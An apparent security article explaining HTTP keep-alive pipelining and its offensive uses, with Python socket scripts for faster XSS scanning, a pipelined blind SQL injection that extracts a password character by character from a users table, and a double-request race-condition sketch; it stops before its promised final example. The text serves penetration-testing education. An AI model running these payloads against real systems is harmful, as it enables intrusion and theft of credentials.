0-day attacks using “keep-alive” connections

Before turning to unconventional uses, I will describe how 'keep-alive' works. The process is quite simple: multiple requests are sent over a single connection, and multiple responses come back from the server. The benefits are obvious: less time spent establishing connections and less load on the CPU and memory. The number of requests per connection is usually limited by the server's settings (in most cases, it is at least several dozen). The procedure for establishing a connection is universal.

  1. In the case of HTTP/1.0, the first request must contain the header Connection: keep-alive.
    If you are using HTTP/1.1, this header is not required at all, but some servers will automatically close connections that are not explicitly declared as persistent. An obstacle may also be created by the header Expect: 100-continue, for example. So, to avoid errors, it is recommended to forcibly add 'keep-alive' to every request.

    ‘Expect’ forcibly closes the connection

  2. When a 'keep-alive' connection is specified, the server looks for the end of the first request. If the request carries no data, the end is deemed to be CRLF (the '\r\n' control characters, though often just two '\n' will also work fine). A request is considered empty if it lacks the 'Content-Length' and 'Transfer-Encoding' headers, or if these headers have zero or malformed values. If they are present and have a valid value, the end of the request is the last byte of the body of the declared length.

    The last byte of declared content may be immediately followed by the next request

  3. If there is more data after the first request, steps '1' and '2' are repeated for it until there are no more correctly formed requests.
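
To make this concrete, here is a minimal sketch of the procedure above: two requests pipelined into a single connection over a raw socket. The host and paths are hypothetical placeholders; this illustrates the mechanics rather than reproducing any particular tool.

```python
import socket

HOST = 'example.com'  # hypothetical target

# Two requests in one packet. Each ends with CRLF CRLF; the first declares
# Connection: keep-alive so that HTTP/1.0 servers keep the socket open,
# and the last one declares Connection: close so the server hangs up
# when it is done, which lets us read until EOF.
payload = (
    'GET /page1 HTTP/1.1\r\n'
    'Host: {0}\r\n'
    'Connection: keep-alive\r\n'
    '\r\n'
    'GET /page2 HTTP/1.1\r\n'
    'Host: {0}\r\n'
    'Connection: close\r\n'
    '\r\n'
).format(HOST)

s = socket.create_connection((HOST, 80))
s.sendall(payload.encode())

# Both responses arrive back to back on the same socket.
raw = b''
while True:
    chunk = s.recv(4096)
    if not chunk:
        break
    raw += chunk
s.close()

print(raw.decode(errors='replace'))
```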

Sometimes, even after the request is correctly terminated, 'keep-alive' does not work as it should due to unknown "magical" characteristics of the server or of the script the request is addressed to. In this case, forcibly initializing the connection with a first HEAD request may prove helpful.

HEAD request launches the sequence of ‘keep-alive’
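
A sketch of that trick, under the same hypothetical host and path assumptions as the previous example: a throwaway HEAD request is simply prepended to the pipelined payload.

```python
import socket

HOST = 'example.com'  # hypothetical target

# A leading HEAD request "warms up" the keep-alive sequence; the request
# we actually care about follows in the same packet.
payload = (
    'HEAD / HTTP/1.1\r\n'
    'Host: {0}\r\n'
    'Connection: keep-alive\r\n'
    '\r\n'
    'GET /page1 HTTP/1.1\r\n'
    'Host: {0}\r\n'
    'Connection: close\r\n'
    '\r\n'
).format(HOST)

s = socket.create_connection((HOST, 80))
s.sendall(payload.encode())
raw = b''
while True:
    chunk = s.recv(4096)
    if not chunk:
        break
    raw += chunk
s.close()
print(raw.decode(errors='replace'))
```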

Thirty by one or one by thirty?

Funny as it may sound, the first and most obvious benefit is the ability to speed up certain types of web application scanning. Let's review a simple example: we need to check a certain XSS vector in an application that includes ten scripts, each accepting three parameters.

I wrote a small Python script that runs through all the pages and checks every parameter one by one, then displays the vulnerable scripts and parameters (let's plant four vulnerabilities) and the time spent on scanning.
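
The original script is not reproduced here, so below is a minimal sketch of what it might look like. The base URL, script names, parameter names, and reflection marker are all hypothetical.

```python
import time
import urllib.parse
import urllib.request

BASE = 'http://127.0.0.1/test'                        # hypothetical test application
SCRIPTS = ['script%d.php' % i for i in range(1, 11)]  # ten scripts
PARAMS = ['a', 'b', 'c']                              # three parameters each
MARKER = '<xss>'                                      # probe reflected back when vulnerable

start = time.time()
vulnerable = []

# One request per script/parameter pair: 10 * 3 = 30 requests in total.
for script in SCRIPTS:
    for param in PARAMS:
        qs = urllib.parse.urlencode({param: MARKER})
        url = '%s/%s?%s' % (BASE, script, qs)
        body = urllib.request.urlopen(url).read().decode(errors='replace')
        if MARKER in body:
            vulnerable.append((script, param))

print(vulnerable)
print(time.time() - start)
```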

Let's try to run it. The resulting runtime was 0.690999984741.

Local test without 'keep-alive'

Now let's try the same thing against a remote resource. In this case, the result was 3.0490000248.

Not bad, but now let's try to use 'keep-alive'. We will rewrite the script so that it sends all thirty requests in a single connection and then parses the response stream to extract the required values, as sketched below.
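A hedged sketch of that rewrite, again with hypothetical names: all thirty requests go out in one packet, and the concatenated responses are split apart and matched back to script/parameter pairs by their position in the queue.

```python
import re
import socket
import time
import urllib.parse

HOST = '127.0.0.1'                                    # hypothetical test application
SCRIPTS = ['script%d.php' % i for i in range(1, 11)]
PARAMS = ['a', 'b', 'c']
MARKER = '<xss>'

start = time.time()
pairs = [(s, p) for s in SCRIPTS for p in PARAMS]

# Build all thirty requests as one payload; responses come back in order.
payload = ''
for script, param in pairs:
    qs = urllib.parse.urlencode({param: MARKER})
    payload += (
        'GET /test/%s?%s HTTP/1.1\r\n'
        'Host: %s\r\n'
        'Connection: keep-alive\r\n'
        '\r\n' % (script, qs, HOST)
    )

s = socket.create_connection((HOST, 80))
s.sendall(payload.encode())

# The server may not close the connection itself, so read until a short timeout.
raw = b''
s.settimeout(2)
try:
    while True:
        chunk = s.recv(65536)
        if not chunk:
            break
        raw += chunk
except socket.timeout:
    pass
s.close()

# Naive split on status lines; response N corresponds to request N,
# assuming no response body itself contains a status line.
responses = re.split(r'(?=HTTP/1\.[01] \d{3})', raw.decode(errors='replace'))[1:]
vulnerable = [pairs[i] for i, body in enumerate(responses) if MARKER in body]

print(vulnerable)
print(time.time() - start)
```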

Let's try to run it locally. The result is 0.167000055313. When we run 'keep-alive' against the remote resource, the result is 0.393999814987.

And all this despite the fact that I had to add 0.15 seconds to avoid any problems caused by the way the request is assembled in Python. A very tangible difference, isn't it? And what if you had thousands of such pages?

Of course, advanced products do not scan in a single thread, but server settings may limit the number of allowed threads. In general, if you distribute the requests intelligently, the load under a persistent connection will be lower and the results will come faster. Besides, penetration testers may have various tasks that often require custom scripts.

Shooting with injections

One such frequently faced routine task is the character-by-character examination of blind SQL injections. If we are not worried about the server (and it is unlikely to "feel" worse than under character-by-character examination or binary search in multiple threads), we can use 'keep-alive' here too, to get maximum results from a minimum number of connections.

The operating principle is simple: we collect the requests for all candidate characters into a single packet and send it. If one of the responses matches the 'true' condition, all we need to do is parse the output and obtain the desired character from the index of the successful response.

Assembling a single packet with all characters and looking for the matched condition in the response
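
A hedged sketch of this idea, with a hypothetical injectable parameter id and a TRUE_MARKER string that appears on the page when the injected condition holds; the position of the matching response gives the character code.

```python
import re
import socket
import urllib.parse

HOST = 'example.com'            # hypothetical vulnerable host
TRUE_MARKER = 'Welcome back'    # hypothetical text shown when the condition is true
POSITION = 1                    # character position being brute-forced
CHARSET = range(32, 127)        # printable ASCII candidates

# One request per candidate character, all pipelined into a single packet.
payload = ''
for code in CHARSET:
    inj = ("1' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),%d,1))=%d-- -"
           % (POSITION, code))
    qs = urllib.parse.urlencode({'id': inj})
    payload += (
        'GET /item.php?%s HTTP/1.1\r\n'
        'Host: %s\r\n'
        'Connection: keep-alive\r\n'
        '\r\n' % (qs, HOST)
    )

s = socket.create_connection((HOST, 80))
s.sendall(payload.encode())

raw = b''
s.settimeout(2)
try:
    while True:
        chunk = s.recv(65536)
        if not chunk:
            break
        raw += chunk
except socket.timeout:
    pass
s.close()

# Responses come back in request order, so the index of the response
# containing TRUE_MARKER maps straight back to the character code.
responses = re.split(r'(?=HTTP/1\.[01] \d{3})', raw.decode(errors='replace'))[1:]
for i, body in enumerate(responses):
    if TRUE_MARKER in body:
        print('character %d is %r' % (POSITION, chr(CHARSET[i])))
        break
```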

Again, this can be useful if the number of threads is limited or if other methods of speeding up character enumeration are unavailable.

Unforeseen Circumstances

Because in a 'keep-alive' connection the server does not spawn additional threads to handle the requests but methodically executes them in queue order, we can achieve lower latency between two requests. In certain circumstances, this can be useful for exploiting logical errors of the 'race condition' type. But is there anything here that you cannot do with several parallel threads? Nevertheless, here is an example of an exceptional situation that can occur only through 'keep-alive'.
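
A minimal sketch of the latency idea, assuming a hypothetical /redeem endpoint whose double execution we want to race: both requests land in the same packet, so the gap between them is as small as the protocol allows.

```python
import socket

HOST = 'example.com'  # hypothetical target

REQ = (
    'POST /redeem HTTP/1.1\r\n'
    'Host: %s\r\n'
    'Connection: keep-alive\r\n'
    'Content-Type: application/x-www-form-urlencoded\r\n'
    'Content-Length: 9\r\n'
    '\r\n'
    'code=TEST' % HOST
)

# Two identical requests in one packet: the server dequeues them back to back,
# with far less jitter between them than two parallel connections would give.
s = socket.create_connection((HOST, 80))
s.sendall((REQ + REQ).encode())
print(s.recv(65536).decode(errors='replace'))
s.close()
```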
